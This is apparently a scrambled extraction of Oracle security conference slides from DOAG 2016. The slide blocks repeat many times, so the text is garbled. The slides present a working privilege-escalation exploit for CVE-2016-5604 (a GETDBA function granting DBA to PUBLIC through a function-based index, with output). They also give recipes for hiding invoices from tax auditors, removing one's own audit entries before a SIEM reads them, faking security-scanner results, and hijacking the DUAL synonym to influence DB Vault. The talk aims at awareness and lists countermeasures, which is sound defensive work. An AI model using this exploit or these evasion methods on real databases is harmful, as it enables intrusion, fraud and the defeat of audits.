SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Modifying SQL Statements and Application Logic
